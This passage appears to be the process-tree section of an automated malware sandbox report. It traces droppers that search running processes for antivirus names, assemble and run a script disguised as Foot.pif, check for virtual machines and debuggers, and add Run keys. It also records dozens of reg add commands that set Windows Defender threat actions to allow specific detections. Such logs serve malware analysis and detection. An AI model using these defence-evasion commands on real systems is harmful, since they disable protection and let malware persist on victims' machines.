  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1888
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3576
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:636
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:1016
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 324267
      4⤵
      System Location Discovery: System Language Discovery
      PID:3784
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b American + Ears + Probe + Banks + Korea + Furnishings + Pursuit + Jpeg + Exclusion + Identifier + School + Quotes + Bulgarian + Patents + Political + Networks + Bio + Prevent + Finance + Sm + Retired 324267\s
      4⤵
      PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
      Foot.pif s
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1960
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:5108
- C:\Users\Admin\Downloads\setup.exe
  "C:\Users\Admin\Downloads\setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Tape Tape.cmd & Tape.cmd & exit
    3⤵
    PID:4012
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4088
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3220
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3764
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2636
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 324267
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b American + Ears + Probe + Banks + Korea + Furnishings + Pursuit + Jpeg + Exclusion + Identifier + School + Quotes + Bulgarian + Patents + Political + Networks + Bio + Prevent + Finance + Sm + Retired 324267\s
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
      Foot.pif s
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3136
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:2956
- C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  2⤵
  - Modifies firewall policy service
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:3020
- C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  C:\Users\Admin\AppData\Local\Temp\324267\Foot.pif
  2⤵
  - Executes dropped EXE
  PID:2560

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4748

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2100

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2712

C:\Windows\SysWOW64\ugjsekhr\htfkhnma.exe
C:\Windows\SysWOW64\ugjsekhr\htfkhnma.exe /d"C:\Users\Admin\Documents\piratemamm\D_IyF2JVTdF3h_AcBm4TwEC1.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2376
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Sets service image path in registry
  - Drops file in System32 directory
  PID:2396
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 540
  2⤵
  - Program crash
  PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5096 -ip 5096
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2376 -ip 2376
1⤵
PID:2912

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3592
- C:\Users\Admin\AppData\Local\Temp\1000036001\691f3ea1e1.exe
  "C:\Users\Admin\AppData\Local\Temp\1000036001\691f3ea1e1.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
    3⤵
    PID:2844
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
      4⤵
      Checks processor information in registry
      Modifies registry class
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:3156
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23682 -prefMapSize 244688 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fcca5a33-f4c6-475b-91e3-37dfe67fca43} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" gpu
        5⤵
        
        PID:4312
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2388 -prefsLen 24602 -prefMapSize 244688 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd0d0e70-5855-4587-89ff-7885ab7b8a44} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" socket
        5⤵
        
        PID:4364
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3060 -childID 1 -isForBrowser -prefsHandle 3204 -prefMapHandle 3016 -prefsLen 22590 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd305bb0-5034-47f0-a7a0-b2dec53b3156} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:5692
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4084 -childID 2 -isForBrowser -prefsHandle 3968 -prefMapHandle 3932 -prefsLen 29092 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff24165-b29d-42e3-a699-8a44eea29122} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:5988
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4952 -prefMapHandle 4948 -prefsLen 29199 -prefMapSize 244688 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0329148e-ae96-4f51-a21e-b52874903d4d} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" utility
        5⤵
        Checks processor information in registry
        
        PID:6464
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 3 -isForBrowser -prefsHandle 5376 -prefMapHandle 5192 -prefsLen 26989 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afdf6360-0653-4b0e-b0b4-efe6add9fefb} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:6836
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5528 -childID 4 -isForBrowser -prefsHandle 5280 -prefMapHandle 5132 -prefsLen 26989 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {661901cb-731a-447e-8885-ec0ec7bda438} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:6848
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5200 -prefMapHandle 4744 -prefsLen 26989 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cc10ae6-2001-40a5-b536-098aa06985f3} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:6880
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6156 -childID 6 -isForBrowser -prefsHandle 6148 -prefMapHandle 6068 -prefsLen 27039 -prefMapSize 244688 -jsInitHandle 900 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b0016ff-2f2d-4de4-85a7-a85ff129b5ad} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        5⤵
        
        PID:6584
- C:\Users\Admin\1000037002\752612fd8e.exe
  "C:\Users\Admin\1000037002\752612fd8e.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:4332
- C:\Users\Admin\AppData\Local\Temp\1000038001\f9769c82fe.exe
  "C:\Users\Admin\AppData\Local\Temp\1000038001\f9769c82fe.exe"
  2⤵
  - Executes dropped EXE
  PID:6308

C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2736

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3604

C:\Users\Admin\AppData\Local\Temp\7zSF569.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSF569.tmp\Install.exe yI /qOdidWgX 525403 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4664
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    PID:1712
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      PID:464
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3100
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5096
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      PID:524
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3748
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:2736
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3740
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2728
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:392
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4596
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3820
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:3140
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4932
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4984
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4960
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\reg.exe
